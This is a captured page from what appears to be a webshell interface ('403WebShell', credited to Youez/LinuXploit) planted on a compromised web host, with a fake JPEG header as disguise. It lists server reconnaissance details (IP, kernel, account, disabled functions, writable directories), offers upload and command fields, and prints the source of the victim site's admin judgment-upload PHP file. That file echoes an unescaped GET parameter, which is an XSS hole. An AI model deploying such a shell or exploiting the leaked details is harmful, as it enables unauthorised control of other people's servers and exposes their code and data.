ÿØÿà JPEG ÿþ; 403WebShell
403Webshell
Server IP : 68.65.120.201  /  Your IP : 216.73.216.73
Web Server : LiteSpeed
System : Linux server179.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
User : taxhyuvu ( 2294)
PHP Version : 8.1.32
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/taxhyuvu/public_html/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/taxhyuvu/public_html/admin/uploadjudgment.php
<!DOCTYPE html>
<html lang="en">
<head>
  <title>Upload Judgment</title>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.3/dist/css/bootstrap.min.css" rel="stylesheet">
  <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.3/dist/js/bootstrap.bundle.min.js"></script>
  
  
  
</head>
<body style="background: #21a3b321;">
<?php 
include('db.php');
$id=$_GET['id'];
?>

<?php
Session_start();
 if(isset($_SESSION['adminlogedin']) && $_SESSION['adminlogedin']==true) { 
    
    $email= $_SESSION['Email_Address03092372779'];
    $user= $_SESSION['user03092372779'];

?>

<Style>
    .form-control:focus {
    color: #212529;
    background-color: #fff;
    border-color: #b7d0f5;
    outline: 0;
    box-shadow: 0 0 0 0.25rem rgba(79, 80, 80, 0.247);
}

 .btn-primary{    background: #009bad;
    border: #0a9eb0;}
    .btn:hover {
    color: var(--bs-btn-hover-color);
    background-color: #98a0a4;
    border-color: #98a0a4;
}
    .head{width: 100%;height: ; 
    background-color: #f7f7f7;}
    .head img{width: 300px;}
.img1st{margin: 0% ;
        padding: 20px}
td{text-align: justify;
    }
    th{text-align: center;    color: #666666;
    }
*{font-family: math !important;
font-size:18px;
}

p{font-family: math !important;
    font-size: 18px;}


.ck.ck-content.ck-editor__editable.ck-rounded-corners.ck-editor__editable_inline.ck-blurred {
    height: 450px;
}
.ck-rounded-corners .ck.ck-editor__main>.ck-editor__editable, .ck.ck-editor__main>.ck-editor__editable.ck-rounded-corners {
    border-radius: var(--ck-border-radius);
    border-top-left-radius: 0;
    border-top-right-radius: 0;
    height: 450px;
}


</Style>
<div class=head>
    <div class="container">
<div class="img1st">

<center>
<img src="Logo.png"></center>
</div>
</div>
</div>
<center><h1 style="font-weight:800;text-transform: capitalize;"><?php echo"$id";?>  Judgment </h1><h3 style="font-weight:800;">(Upload)</h3></center>
<form action="judgmentdata" method="post">
<div class="container" style="max-width: 1155px; box-shadow: 5px 5px 5px 5px #888888;background: #f7f7f7;border: 3px solid #a0a0a0; padding: 20px;">
<center><h2 style="font-weight: 800;">  <input type="text" placeholder="Case No. 101 of 2022" name="CaseNo" class="form-control" style="width:200px;" value="THLN <?php echo rand(1, 9999); ?>"</h2>
<h3 style="    font-size: 23px;
font-weight: 800;
">
<select  id="Year"   class="form-control" style="width:200px;" name="Year">
<option value="" disabled selected hidden>Select Year</option>
<?php
$Year1="SELECT * FROM `plus` ORDER BY `plus`.`Year` DESC";
$data11=mysqli_query($con,$Year1);
?>
<?php foreach ($data11 as $yy ) {
  
?>
    <option value="<?php echo $yy['Year']?>"><?php echo $yy['Year']?></option><?php } ?>
 
</select>
<select  id="cars"   class="form-control" style="width:200px;" name="Court">
<option value="" disabled selected hidden>Select Court</option>
<?php
$Year11="SELECT * FROM `pluss`";
$data111=mysqli_query($con,$Year11);
?>
<?php foreach ($data111 as $yyy ) {
  
?>
    <option value="<?php echo $yyy['Court']?>"><?php echo $yyy['Court']?></option><?php } ?>
</select></h3></center>
<p style=""><input type="text" placeholder="Citations Reference No. " class="form-control" style="" name="Ref" > </p>
<P><B>Judges</B><Br><textarea type="text" placeholder="Add Justice " class="form-control" style="width:300px;" name="Present"> </textarea><br>
    </P>
<center>
    <h5 style="font-weight: 800; "><textarea type="text" placeholder="" class="form-control" style="width:530px;" name="Vs1"></textarea>
        <Br>VS<BR>
        <textarea type="text" placeholder="" class="form-control" style="width:530px;" name="Vs2"></textarea></h5></center>
        <p><b>PRESENT (Adv):</b></p>
        <p><B></B>  <textarea type="text" placeholder="Add Petitioner" class="form-control" style="width:300px;" name="Peti"></textarea>
            </p>
            <p><B></B> <textarea type="text" placeholder="Add Respondent" class="form-control" style="width:300px;" name="Respo"></textarea>
            </p>

    <p>
        <div class="row">
            <div class="col-md-3">    
                <span><B>Law:</B></span> <textarea type="text" placeholder="Add Law" class="form-control" style="width:100%;" name="Law"></textarea><BR>
                <span><B>Sections:</B></span> <textarea type="text" placeholder="Add Sections" class="form-control" style="width:100%;" name="Sect"></textarea>
            </div>
            
             <div class="col-md-3">    
                <span><B>Law 2:</B></span> <textarea type="text" placeholder="Add Law" class="form-control" style="width:100%;" name="Law2" value="">null</textarea><BR>
                <span><B>Sections:</B></span> <textarea type="text" placeholder="Add Sections" class="form-control" style="width:100%;" name="Sect2" value="null">null</textarea>
            </div>
            
             <div class="col-md-3">    
                <span><B>Law 3:</B></span> <textarea type="text" placeholder="Add Law" class="form-control" style="width:100%;" name="Law3" value="null">null</textarea><BR>
                <span><B>Sections:</B></span> <textarea type="text" placeholder="Add Sections" class="form-control" style="width:100%;" name="Sect3" value="null">null</textarea>
            </div>
            
             <div class="col-md-3">    
                <span><B>Law 4:</B></span> <textarea type="text" placeholder="Add Law" class="form-control" style="width:100%;" name="Law4" value="null">null</textarea><BR>
                <span><B>Sections:</B></span> <textarea type="text" placeholder="Add Sections" class="form-control" style="width:100%;" name="Sect4" value="null">null</textarea>
            </div>
        </div> 
    </p>
        

        <center><h5 style="font-weight: 800; font-size: 22px;"><input type="text" placeholder="Add heading" class="form-control" name="Head1" style="width:200px;"></h5></center>
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css" integrity="sha384-MCw98/SFnGE8fJT3GXwEOngsV7Zt27NXFoaoApmYm81iuXoPkFOJwJ8ERdknLPMO" crossorigin="anonymous">

<script src="https://code.jquery.com/jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>

<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/2.6.0/umd/popper.min.js" integrity="sha512-BmM0/BQlqh02wuK5Gz9yrbe7VyIVwOzD1o40yi1IsTjriX/NGF37NyXHfmFzIlMmoSIBXgqDiG1VNU6kB5dBbA==" crossorigin="anonymous"></script>

<!--<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/js/bootstrap.min.js" integrity="sha384-ChfqqxuZUCnJSK3+MXmPNIyE6ZbWh2IMqE241rYiqJxyMiZ6OW/JmZQ5stwEULTy" crossorigin="anonymous"></script>-->
<!--<script src="https://cdn.tiny.cloud/1/no-api-key/tinymce/6/tinymce.min.js" referrerpolicy="origin"></script>-->
  <!--<script src="https://cdn.tiny.cloud/1/tq0hr7verxsogwmiin273odsbrqihg80o6aew6iygm2f7hr2/tinymce/6/tinymce.min.js" referrerpolicy="origin"></script>-->
<!--<script src="https://cdn.tiny.cloud/1/tq0hr7verxsogwmiin273odsbrqihg80o6aew6iygm2f7hr2/tinymce/6/tinymce.min.js" referrerpolicy="origin"></script>-->

<!--<script src="https://cdn.tiny.cloud/1/wqzze8zmlbvq8lgss6fk8xxg200bo479mq9qykzqdw9f0e8p/tinymce/7/tinymce.min.js" referrerpolicy="origin"></script>        -->
<!--       <script>-->
<!--          tinymce.init({-->
<!--            selector: 'textarea#editor',-->
<!--          });-->
<!--        </script>-->

<script src="https://cdn.ckeditor.com/ckeditor5/36.0.1/classic/ckeditor.js"></script>
    <script>
        document.addEventListener("DOMContentLoaded", function() {
            ClassicEditor
                .create(document.querySelector('textarea[name="Para1"]'))
                .catch(error => {
                    console.error(error);
                });

            ClassicEditor
                .create(document.querySelector('textarea[name="Para2"]'))
                .catch(error => {
                    console.error(error);
                });
                
            ClassicEditor
                .create(document.querySelector('textarea[name="Para3"]'))
                .catch(error => {
                    console.error(error);
                });
                
              ClassicEditor
                .create(document.querySelector('textarea[name="Para4"]'))
                .catch(error => {
                    console.error(error);
                });
        });
    </script>

<link href="https://cdnjs.cloudflare.com/ajax/libs/select2/4.0.13/css/select2.min.css" rel="stylesheet"/>

<P style="text-align: justify;">
    
<textarea id="editor" name="Para1" placeholder="Page1"></textarea><br>
<textarea id="editor" name="Para2" placeholder="Page 2"></textarea>
<center><h5 style="font-weight: 800; font-size: 22px;" ><input type="text" placeholder="Add heading" name="Head2" class="form-control" style="width:200px;"></h5></center>

<textarea id="editor" name="Para3" placeholder="Page3"></textarea><br>
<textarea id="editor" name="Para4" placeholder="Page4"></textarea><br>

        <p style="    border-top: dashed;
        border-bottom: dashed;
        color: red;
        border-color: rgb(191 36 36 / 54%); ">
       Disclaimer /Note: We have reproduced the judgment for facilitation of readers; 
            however, the readers must study the original or certified copy of the above said 
            judgment before referring it in any Court of Law. The judgment as reproduced above is 
            a reported judgment available in law magazines and journals namely <B style="color:black;"><input type="text" class="form-control" style="width:200px; display:inline;" placeholder="Enter PTD " name="PTD"></B>
           <BR><input type="text" class="form-control" style="width:200px; display:inline;" placeholder="Other SLD " name="SLD">
           <BR><input type="text" class="form-control" style="width:200px; display:inline;" placeholder="Other PTCL " name="PTCL">
           <BR><input type="text" class="form-control" style="width:200px; display:inline;" placeholder="Other Tax" name="Tax">
           <BR><input type="text" class="form-control" style="width:200px; display:inline;" placeholder="Other SCMR" name="SCMR">
           <BR><input type="text" class="form-control" style="width:200px; display:inline;" placeholder="Other PLD" name="PLD">
           <BR><input type="text" class="form-control" style="width:200px; display:inline;" placeholder="Other PDS" name="PDS">
           </p>
           <center>
            <?php echo $_SESSION['fname'];
            
            echo "<input type='hidden' name='dates'  value='" . date('d-M-Y') . "' required/>";
           ?>
             <input type="hidden" name="eemail" value="<?php echo "$email"?>">        
            <input type="hidden" name="Catag" value="<?php echo "$id";?>">
            <input type="hidden" name="Uploader" value="<?php echo $_SESSION['fname'];?>">
<button type="submit" name="go" class="btn btn-primary" style="width:500px; font-weight:800;">Upload judgment</button>
</center>  </div></form>


<?php } 
else{ echo '<script>window.open("login", "_self")</script>'; } ?>

Youez - 2016 - github.com/yon3zu
LinuXploit